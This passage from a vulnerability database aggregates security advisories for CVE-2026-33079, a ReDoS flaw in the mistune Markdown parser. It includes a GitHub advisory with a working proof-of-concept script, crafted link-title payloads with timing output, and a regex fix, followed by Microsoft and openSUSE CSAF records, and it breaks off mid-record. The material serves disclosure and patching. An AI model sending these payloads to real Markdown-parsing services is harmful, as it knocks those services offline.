[`parse_link()`](https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L178) \u2192 [`parse_link_title()`](https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L169)\n2. **Block link reference definitions**: `[label]: url \"PAYLOAD` \u2192 [`BlockParser.parse_ref_link()`](https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/block_parser.py#L220) \u2192 [`parse_link_title()`](https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L169) at [block_parser.py#L259](https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/block_parser.py#L259)\n\n### PoC\n\n```python\nimport mistune\nimport time\n\nmd = mistune.create_markdown()\n\n# Test with increasing N (number of \\! pairs)\nfor n in [15, 18, 20, 22, 25]:\n payload = \u0027[x](y \"\u0027 + \u0027\\\\!\u0027 * n + \u0027)\u0027\n start = time.time()\n md(payload)\n elapsed = time.time() - start\n print(f\"N={n:2d} len={len(payload):3d} bytes time={elapsed:.3f}s\")\n```\n\nOutput (Apple M2, Python 3.14.3, mistune 3.2.0):\n\n```\nN=15 len= 38 bytes time=0.007s\nN=18 len= 44 bytes time=0.044s\nN=20 len= 48 bytes time=0.178s\nN=22 len= 52 bytes time=0.740s\nN=25 len= 58 bytes time=5.922s\n```\n\nEach increment of N roughly doubles the execution time (consistent with O(2^N)).\n\nThe same attack works via block link reference definitions:\n\n```python\npayload = \u0027[l]: u \"\u0027 + \u0027\\\\!\u0027 * 25 # 58 bytes, ~6 seconds\nmd(payload)\n```\n\n### Impact\n\nThis is a denial of service vulnerability. Any application or service that parses user-supplied Markdown using mistune can be made unresponsive by an attacker submitting a small crafted input (under 100 bytes).\n\nAffected use cases include:\n- Web applications with Markdown-enabled input fields (comments, posts, descriptions)\n- Documentation systems that accept user contributions\n- API endpoints that process Markdown\n- Jupyter tooling such as nbconvert that relies on mistune for rendering\n\n### Suggested Fix\n\nExclude the backslash character from the catch-all character class to eliminate the alternation overlap:\n\n```python\n# Before (vulnerable):\nr\u0027\"(?:\\\\\u0027 + PUNCTUATION + r\u0027|[^\"\\x00])*\"\u0027\nr\"\u0027(?:\\\\\" + PUNCTUATION + r\"|[^\u0027\\x00])*\u0027\"\n\n# After (fixed):\nr\u0027\"(?:\\\\\u0027 + PUNCTUATION + r\u0027|[^\"\\\\\\x00])*\"\u0027\nr\"\u0027(?:\\\\\" + PUNCTUATION + r\"|[^\u0027\\\\\\x00])*\u0027\"\n```\n\nThis ensures a backslash can only be consumed by the escaped-punctuation branch, eliminating the ambiguity in both the double-quote and single-quote branches. Verified on mistune 3.2.0 (Apple M2, Python 3.14.3):\n- Reduces N=25 from 4.2 seconds to 0.000006 seconds (700,000x improvement)\n- Handles N=50 in 0.000008 seconds\n- Passes all existing functional tests (quoted titles, escaped quotes, escaped punctuation)",
"id": "GHSA-8mp2-v27r-99xp",
"modified": "2026-05-06T19:35:51Z",
"published": "2026-05-06T16:52:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lepture/mistune/security/advisories/GHSA-8mp2-v27r-99xp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33079"
},
{
"type": "PACKAGE",
"url": "https://github.com/lepture/mistune"
},
{
"type": "WEB",
"url": "https://github.com/lepture/mistune/blob/df23edd60b43b639d2e6760ef9dd3d618aa11c21/src/mistune/helpers.py#L20-L25"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input"
}
MSRC_CVE-2026-33079
Vulnerability from csaf_microsoft - Published: 2026-05-02 00:00 - Updated: 2026-05-15 14:41| URL | Category |
|---|---|
| https://msrc.microsoft.com/csaf/vex/2026/msrc_cve… | self |
| https://support.microsoft.com/lifecycle | external |
| https://www.first.org/cvss | external |
| https://msrc.microsoft.com/csaf/vex/2026/msrc_cve… | self |
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2026-33079 Mistune ReDoS in LINK_TITLE_RE allows denial of service with crafted Markdown titles - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2026/msrc_cve-2026-33079.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "Mistune ReDoS in LINK_TITLE_RE allows denial of service with crafted Markdown titles",
"tracking": {
"current_release_date": "2026-05-15T14:41:41.000Z",
"generator": {
"date": "2026-05-16T07:10:15.006Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2026-33079",
"initial_release_date": "2026-05-02T00:00:00.000Z",
"revision_history": [
{
"date": "2026-05-10T01:03:25.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2026-05-11T14:47:13.000Z",
"legacy_version": "2",
"number": "2",
"summary": "Information published."
},
{
"date": "2026-05-15T14:41:41.000Z",
"legacy_version": "3",
"number": "3",
"summary": "Information published."
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003cazl3 python-mistune 0:3.0.2-1.azl3",
"product": {
"name": "\u003cazl3 python-mistune 0:3.0.2-1.azl3",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "azl3 python-mistune 0:3.0.2-1.azl3",
"product": {
"name": "azl3 python-mistune 0:3.0.2-1.azl3",
"product_id": "21330"
}
}
],
"category": "product_name",
"name": "python-mistune"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 python-mistune 0:3.0.2-1.azl3 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 python-mistune 0:3.0.2-1.azl3 as a component of Azure Linux 3.0",
"product_id": "21330-17084"
},
"product_reference": "21330",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-33079",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"21330-17084"
],
"known_affected": [
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-33079 Mistune ReDoS in LINK_TITLE_RE allows denial of service with crafted Markdown titles - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2026/msrc_cve-2026-33079.json"
}
],
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-10T01:03:25.000Z",
"details": "0:3.2.1-1.azl3:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"title": "Mistune ReDoS in LINK_TITLE_RE allows denial of service with crafted Markdown titles"
}
]
}
OPENSUSE-SU-2026:10761-1
Vulnerability from csaf_opensuse - Published: 2026-05-12 00:00 - Updated: 2026-05-12 00:00| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64 | — |
Vendor Fix
|
| URL | Category |
|---|---|
| https://www.suse.com/support/security/rating/ | external |
| https://ftp.suse.com/pub/projects/security/csaf/o… | self |
| https://www.suse.com/security/cve/CVE-2026-33079/ | self |
| https://www.suse.com/security/cve/CVE-2026-33441/ | self |
| https://www.suse.com/security/cve/CVE-2026-44897/ | self |
| https://www.suse.com/security/cve/CVE-2026-33079 | external |
| https://bugzilla.suse.com/1264347 | external |
| https://www.suse.com/security/cve/CVE-2026-33441 | external |
| https://bugzilla.suse.com/1264752 | external |
| https://www.suse.com/security/cve/CVE-2026-44897 | external |
| https://bugzilla.suse.com/1264750 | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python311-mistune-3.2.1-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python311-mistune-3.2.1-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10761",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10761-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-33079 page",
"url": "https://www.suse.com/security/cve/CVE-2026-33079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-33441 page",
"url": "https://www.suse.com/security/cve/CVE-2026-33441/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44897 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44897/"
}
],
"title": "python311-mistune-3.2.1-1.1 on GA media",
"tracking": {
"current_release_date": "2026-05-12T00:00:00Z",
"generator": {
"date": "2026-05-12T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10761-1",
"initial_release_date": "2026-05-12T00:00:00Z",
"revision_history": [
{
"date": "2026-05-12T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-mistune-3.2.1-1.1.aarch64",
"product": {
"name": "python311-mistune-3.2.1-1.1.aarch64",
"product_id": "python311-mistune-3.2.1-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-mistune-3.2.1-1.1.aarch64",
"product": {
"name": "python313-mistune-3.2.1-1.1.aarch64",
"product_id": "python313-mistune-3.2.1-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-mistune-3.2.1-1.1.aarch64",
"product": {
"name": "python314-mistune-3.2.1-1.1.aarch64",
"product_id": "python314-mistune-3.2.1-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-mistune-3.2.1-1.1.ppc64le",
"product": {
"name": "python311-mistune-3.2.1-1.1.ppc64le",
"product_id": "python311-mistune-3.2.1-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-mistune-3.2.1-1.1.ppc64le",
"product": {
"name": "python313-mistune-3.2.1-1.1.ppc64le",
"product_id": "python313-mistune-3.2.1-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-mistune-3.2.1-1.1.ppc64le",
"product": {
"name": "python314-mistune-3.2.1-1.1.ppc64le",
"product_id": "python314-mistune-3.2.1-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-mistune-3.2.1-1.1.s390x",
"product": {
"name": "python311-mistune-3.2.1-1.1.s390x",
"product_id": "python311-mistune-3.2.1-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-mistune-3.2.1-1.1.s390x",
"product": {
"name": "python313-mistune-3.2.1-1.1.s390x",
"product_id": "python313-mistune-3.2.1-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-mistune-3.2.1-1.1.s390x",
"product": {
"name": "python314-mistune-3.2.1-1.1.s390x",
"product_id": "python314-mistune-3.2.1-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-mistune-3.2.1-1.1.x86_64",
"product": {
"name": "python311-mistune-3.2.1-1.1.x86_64",
"product_id": "python311-mistune-3.2.1-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-mistune-3.2.1-1.1.x86_64",
"product": {
"name": "python313-mistune-3.2.1-1.1.x86_64",
"product_id": "python313-mistune-3.2.1-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-mistune-3.2.1-1.1.x86_64",
"product": {
"name": "python314-mistune-3.2.1-1.1.x86_64",
"product_id": "python314-mistune-3.2.1-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-mistune-3.2.1-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64"
},
"product_reference": "python311-mistune-3.2.1-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-mistune-3.2.1-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le"
},
"product_reference": "python311-mistune-3.2.1-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-mistune-3.2.1-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x"
},
"product_reference": "python311-mistune-3.2.1-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-mistune-3.2.1-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64"
},
"product_reference": "python311-mistune-3.2.1-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-mistune-3.2.1-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64"
},
"product_reference": "python313-mistune-3.2.1-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-mistune-3.2.1-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le"
},
"product_reference": "python313-mistune-3.2.1-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-mistune-3.2.1-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x"
},
"product_reference": "python313-mistune-3.2.1-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-mistune-3.2.1-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64"
},
"product_reference": "python313-mistune-3.2.1-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-mistune-3.2.1-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64"
},
"product_reference": "python314-mistune-3.2.1-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-mistune-3.2.1-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le"
},
"product_reference": "python314-mistune-3.2.1-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-mistune-3.2.1-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x"
},
"product_reference": "python314-mistune-3.2.1-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-mistune-3.2.1-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
},
"product_reference": "python314-mistune-3.2.1-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-33079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-33079"
}
],
"notes": [
{
"category": "general",
"text": "In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated ! sequences with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-33079",
"url": "https://www.suse.com/security/cve/CVE-2026-33079"
},
{
"category": "external",
"summary": "SUSE Bug 1264347 for CVE-2026-33079",
"url": "https://bugzilla.suse.com/1264347"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-12T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-33079"
},
{
"cve": "CVE-2026-33441",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-33441"
}
],
"notes": [
{
"category": "general",
"text": "This CVE is a duplicate of another CVE: CVE-2026-33079.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-33441",
"url": "https://www.suse.com/security/cve/CVE-2026-33441"
},
{
"category": "external",
"summary": "SUSE Bug 1264752 for CVE-2026-33441",
"url": "https://bugzilla.suse.com/1264752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
